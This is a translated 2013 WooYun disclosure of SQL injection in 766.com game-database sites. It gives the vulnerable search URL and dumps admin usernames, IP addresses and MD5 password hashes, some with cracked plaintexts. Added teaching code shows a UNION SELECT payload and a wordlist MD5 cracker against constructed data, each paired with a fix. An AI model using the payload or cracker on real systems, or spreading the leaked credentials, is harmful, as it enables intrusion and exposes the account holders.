
Vulnerability summary

Defect ID: wooyun-2013-035621

Title: A pile of long-unmaintained 766 websites have SQL injection

Vendor: 766.com

Author: Ovear

Submitted: 2013-08-29 18:54

Fixed: 2013-09-03 18:55

Published: 2013-09-03 18:55

Vulnerability type: SQL injection

Severity: Low

Self-assessed Rank: 2

Status: Vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org. For questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-08-29: Details sent to the vendor, awaiting vendor handling
2013-09-03: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

You know, the most basic SQL injection.

Detailed description:

Most of the DB query sites use one and the same system.
The injection point is
http://at.db.766.com/search.php?search.php?action=8&start=16&end=30&gwpage=3#gw
There are others using the same system, 梦幻西游 (Fantasy Westward Journey) and so on; basically they are websites that have fallen into disrepair.
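The report does not show the server-side code, only the URL with numeric `start`/`end` parameters. The example below is added here and is not 766.com's code: it reconstructs the generic pattern that produces this class of bug (GET values pasted straight into a range predicate) against an in-memory SQLite database with constructed rows, shows a UNION payload pulling the admin table through the `end` parameter, and places a hardened version beside it that validates the integers and binds them as query parameters. Table and column names are borrowed from the dump below but the row contents are invented.

```python
import sqlite3

# Constructed stand-in for the dumped schema: a data table and an admin table.
SAMPLE_SCHEMA = """
    CREATE TABLE x_at_datas (id INTEGER PRIMARY KEY, name TEXT);
    CREATE TABLE x_admins (uid INTEGER, username TEXT, password TEXT);
    INSERT INTO x_at_datas (name) VALUES ('item1'), ('item2'), ('item3');
    INSERT INTO x_admins VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
"""


def make_db():
    """Return a fresh in-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    return conn


def search_vulnerable(conn, start, end):
    """Assumed shape of the broken search.php: ?start=&end= concatenated into SQL.

    Anything in `end` after the number becomes part of the statement, so a
    UNION SELECT against x_admins rides along with the legitimate rows.
    """
    sql = f"SELECT name FROM x_at_datas WHERE id BETWEEN {start} AND {end}"
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, start, end):
    """Hardened variant: strict integer parsing, bounds check, bound parameters."""
    try:
        lo, hi = int(start), int(end)
    except (TypeError, ValueError):
        raise ValueError("start and end must be integers")
    if lo < 1 or hi < lo or hi - lo > 100:
        raise ValueError("range out of bounds")
    # Placeholders keep the values out of the SQL text entirely; even if a
    # non-integer slipped past int(), the driver would bind it as data.
    sql = "SELECT name FROM x_at_datas WHERE id BETWEEN ? AND ?"
    return [row[0] for row in conn.execute(sql, (lo, hi))]


def fixed_rejects(conn, start, end):
    """True when the hardened query refuses the input instead of running it."""
    try:
        search_fixed(conn, start, end)
    except ValueError:
        return True
    return False


# Attacker-controlled value for the `end` parameter: closes the numeric range
# and appends a UNION that reads username:hash pairs from the admin table.
PAYLOAD = "3 UNION SELECT username || ':' || password FROM x_admins"

if __name__ == "__main__":
    db = make_db()
    print("legit  :", search_vulnerable(db, "1", "2"))
    print("leaked :", search_vulnerable(db, "1", PAYLOAD))
    print("fixed  :", search_fixed(db, "1", "2"))
    print("reject :", fixed_rejects(db, "1", PAYLOAD))
```

The hardened function keeps the input as an integer from the first line onward; bounding the page size also stops the `start`/`end` pair from being used to dump a whole table one request at a time.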

Proof of vulnerability:

+-----+---------+---------------+----------+-------------------------------------------+------------+--------------+
| uid | adminid | lastip | username | password | updateuser | lastactivity |
+-----+---------+---------------+----------+-------------------------------------------+------------+--------------+
| 1 | 1 | 117.84.151.95 | dragon | 8621ffdbc5698829397d97767ac13db3 (dragon) | <blank> | 1319755592 |
| 2 | 1 | 218.66.36.119 | 上天入地 | e10adc3949ba59abbe56e057f20f883e (123456) | <blank> | 1245824876 |
| 3 | 1 | 117.84.151.95 | bayon3t | 326cbac35cb3b880ecd5ff67dcd276aa (banker) | <blank> | 1319755703 |
| 4 | 1 | 218.66.36.119 | keepnet | 6cc1c40f6caa5f92897e4241a31b8991 | <blank> | 1307431737 |
| 5 | 3 | 218.66.57.81 | 766com | 5b711ebff2c42e3cfac6e3ec63781d3e | <blank> | 1361329083 |
+-----+---------+---------------+----------+-------------------------------------------+------------+--------------+


[22 tables]
+-----------------+
| x_admins |
| x_adminsessions |
| x_at_charaters |
| x_at_datas |
| x_at_types |
| x_attachtypes |
| x_codes |
| x_failedlogins |
| x_gws |
| x_keywords |
| x_maps |
| x_npcs |
| x_occs |
| x_rws |
| x_settings |
| x_skills |
| x_styles |
| x_stylevars |
| x_templates |
| x_wps |
| x_yblevs |
| x_ybs |
+-----------------+


Database: db_mhxy
Table: m_admins
[13 entries]
+---------+--------------+---------------+----------------------------------+-----+------------+
| adminid | lastactivity | lastip | password | uid | username |
+---------+--------------+---------------+----------------------------------+-----+------------+
| 1 | 1310372668 | 120.35.10.225 | 3694e44a7669c4986424bfbb8897cfdf | 13 | xiaomo |
| 1 | 1310375919 | 120.35.10.225 | 348f10f863b27ec106195c96e23dcd91 | 12 | xiaoyu |
| 1 | 1301646109 | 218.66.36.119 | 1bed827ff753e81958090540dced95af | 11 | xiu |
| 1 | 1301475208 | 120.35.10.225 | 3dc5f2a5448ea681ad7ec5a59ca11f2e | 10 | xiangxiang |
| 1 | 1301476079 | 120.35.10.225 | 242bfc1fb44b238986ab168d3610b771 | 9 | yingzi |
| 1 | 1310630815 | 218.66.36.119 | df1bfa7d7bd66664564262fe4dbc8bcc | 8 | daodao |
| 1 | 1301449543 | 120.35.10.225 | afe1b6a9a0055f31096ffd2c8b8066e1 | 7 | dilei |
| 1 | 1301364743 | 120.35.10.225 | a3fbf203ed16a936a471b674f09846da | 6 | junfeng |
| 1 | 1301645302 | 120.35.10.225 | 688f227b9cad4edeed15f067e04d3764 | 5 | lei |
| 1 | 1300675347 | 120.35.10.225 | f4fe292eb01627a0219872d44a305ec5 | 4 | x5 |
| 1 | 1305005162 | 218.66.36.119 | ff89cc66529a8e4aa81bac2a86fa51be | 3 | vincentkid |
| 1 | 1302689813 | 218.66.36.119 | 73f50c9f17291ce93ee52e50b73f6f63 | 2 | lan |
| 1 | 1317088177 | 218.66.36.119 | e10adc3949ba59abbe56e057f20f883e | 1 | admin |
+---------+--------------+---------------+----------------------------------+-----+------------+
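The dumps above hold 32-hex-character values that the author already matched to plaintexts in parentheses (e.g. `e10adc3949ba59abbe56e057f20f883e` is the MD5 of `123456`), which means the passwords are stored as unsalted MD5. The example below is added here and is not the author's tooling: it runs the dictionary lookup that recovers such hashes against a constructed five-word list, flags accounts that share a hash (identical passwords are visible without cracking anything), and shows a salted PBKDF2 store-and-verify pair as the replacement. Only the `123456` match is asserted; the other dumped hashes are included as-is from the tables.

```python
import hashlib
import os
import hmac

# Hashes copied from the x_admins / m_admins dumps on this page (unsalted MD5).
DUMPED = {
    "admin": "e10adc3949ba59abbe56e057f20f883e",
    "上天入地": "e10adc3949ba59abbe56e057f20f883e",
    "dragon": "8621ffdbc5698829397d97767ac13db3",
    "bayon3t": "326cbac35cb3b880ecd5ff67dcd276aa",
    "766com": "5b711ebff2c42e3cfac6e3ec63781d3e",
}

# Constructed toy wordlist; a real attacker uses tens of millions of entries.
WORDLIST = ["123456", "password", "dragon", "banker", "admin"]


def crack_md5(hashes, wordlist):
    """Reverse unsalted MD5 by hashing the wordlist once and looking each hash up.

    Returns {username: plaintext or None}. Because there is no salt, one
    precomputed table serves every user at once.
    """
    table = {hashlib.md5(w.encode("utf-8")).hexdigest(): w for w in wordlist}
    return {user: table.get(h.lower()) for user, h in hashes.items()}


def shared_hashes(hashes):
    """Group users whose stored hash is identical: same hash means same password."""
    groups = {}
    for user, h in hashes.items():
        groups.setdefault(h.lower(), []).append(user)
    return {h: sorted(users) for h, users in groups.items() if len(users) > 1}


# Replacement storage scheme (assumption: PBKDF2-HMAC-SHA256 chosen for stdlib
# availability; bcrypt/scrypt/argon2 are equally valid choices).
PBKDF2_ROUNDS = 200_000


def store_password(password):
    """Return 'salt_hex$hash_hex' with a fresh 16-byte random salt per user."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), PBKDF2_ROUNDS
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    for user, plain in crack_md5(DUMPED, WORDLIST).items():
        print(f"{user:12} {'-> ' + plain if plain else '(not in wordlist)'}")
    print("shared:", shared_hashes(DUMPED))
    a, b = store_password("123456"), store_password("123456")
    print("salted stores differ:", a != b, "verify:", verify_password("123456", a))
```

With the salted scheme, two users who both chose `123456` get unrelated records, so neither the wordlist table nor the shared-hash grouping above works against the new store.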


Fix:

Delete what should be deleted, patch what should be patched.

Copyright notice: when reposting, please credit the source: Ovear@WooYun


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2013-09-03 18:55

Vendor reply:

Latest status:

None yet

